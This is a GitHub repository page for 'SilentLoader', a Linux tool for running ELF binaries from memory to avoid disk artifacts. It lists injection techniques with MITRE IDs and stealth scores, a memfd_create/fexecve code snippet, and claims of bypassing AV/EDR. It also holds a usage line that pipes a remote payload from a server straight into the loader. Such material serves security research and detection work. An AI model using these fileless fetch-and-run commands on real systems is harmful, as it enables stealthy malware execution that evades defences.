Skip to content

mazen91111/SilentLoader

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

1 Commit
.gitignore
.gitignore
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 
memfd_loader.sh
memfd_loader.sh
 
 
requirements.txt
requirements.txt
 
 
silent_loader.py
silent_loader.py
 
 

Repository files navigation

SilentLoader -- Linux In-Memory ELF Loader

  +=====================================================+
  |    SilentLoader -- Linux In-Memory ELF Loader       |
  |  memfd_create . /proc/self/mem . shm_open . ptrace  |
  |    Author: mazen91111 (parasite911)                  |
  +=====================================================+

Execute ELF binaries directly from memory without ever touching disk. Uses memfd_create(2), /proc/self/mem, shm_open, and userland exec techniques. Bash loader script + Python analysis framework.

Loading Techniques

# Technique MITRE ID Stealth Disk Touch Kernel
1 memfd_create + fexecve T1620 9/10 NO >= 3.17
2 memfd_create + execveat T1620 10/10 NO >= 3.19
3 /proc/self/mem Direct Write T1055.009 8/10 NO >= 2.6
4 shm_open + mmap Execution T1055.001 7/10 NO >= 2.6
5 process_vm_writev Remote T1055.009 8/10 NO >= 3.2
6 ELF Userland Exec (ul_exec) T1620 10/10 NO >= 2.6

Installation

git clone https://github.com/mazen91111/SilentLoader.git
cd SilentLoader
pip install -r requirements.txt
chmod +x memfd_loader.sh

Usage

Python Framework

# Full analysis + simulation
python3 silent_loader.py --demo

# Show loading techniques
python3 silent_loader.py --techniques

# Run injection simulation
python3 silent_loader.py --simulate

# Analyze a real ELF binary
python3 silent_loader.py --analyze /usr/bin/ls

Bash Loader

# Demo mode (show techniques)
./memfd_loader.sh --demo

# Load ELF from file into memory
./memfd_loader.sh ./payload

# Fully fileless -- pipe from network
curl -s http://server/payload | ./memfd_loader.sh -

Example Output

  [*] SilentLoader -- Analyzing in-memory loading techniques...

  [ LOADING TECHNIQUES ]

  | #1  memfd_create + fexecve
  | MITRE: T1620  |  Stealth: [||||||||||] 9/10
  | Disk Touch: NO -- MEMORY ONLY  |  Kernel: >= 3.17
  | Code:
  |   int fd = syscall(SYS_memfd_create, "", MFD_CLOEXEC);
  |   write(fd, elf_buf, elf_size);
  |   fexecve(fd, argv, envp);

  [ IN-MEMORY LOADING SIMULATION ]

  | [OK] memfd_create + fexecve
  |   FD Path   : /proc/self/fd/3 -> /memfd: (deleted)
  |   Mem Addr   : 0x7f4a2c8e1b3d
  |   Risk       : LOW
  |   Artifacts  :
  |     - /proc/<pid>/fd/ shows memfd: link
  |     - /proc/<pid>/maps shows anon_inode:[memfd]

  [ DETECTION ANALYSIS ]
  x File-based AV/EDR: BYPASSED -- no file on disk to scan
  x Disk forensics:    BYPASSED -- zero disk artifacts
  + seccomp-bpf:       EFFECTIVE -- can block memfd_create/execveat
  + eBPF tracing:      EFFECTIVE -- syscall-level visibility

Key Concepts

  • memfd_create = kernel syscall that creates anonymous file in memory (no disk path)
  • execveat + AT_EMPTY_PATH = execute from fd without needing /proc mounted
  • /proc/self/mem = direct access to process memory for in-place code modification
  • Userland Exec = parse ELF manually, mmap segments, jump to entry -- no execve syscall at all
  • shm_open = POSIX shared memory in tmpfs (RAM-backed), unlink immediately after mmap

Author

Mazen Obed -- @mazen91111 Linux Internals | Fileless Execution | In-Memory Loading

Disclaimer

For authorized security research ONLY. Understanding in-memory loading is essential for detecting fileless malware.

License

MIT License

About

Linux In-Memory ELF Loader -- Execute binaries from memory via memfd_create, /proc/self/mem, shm_open. Zero disk artifacts. Bash + Python.

Topics

linux bash red-team elf-loader process-injection in-memory-execution fileless-malware memfd-create

Resources

Readme

License

MIT license
Activity

Stars

0 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

 
 
 

Contributors

Languages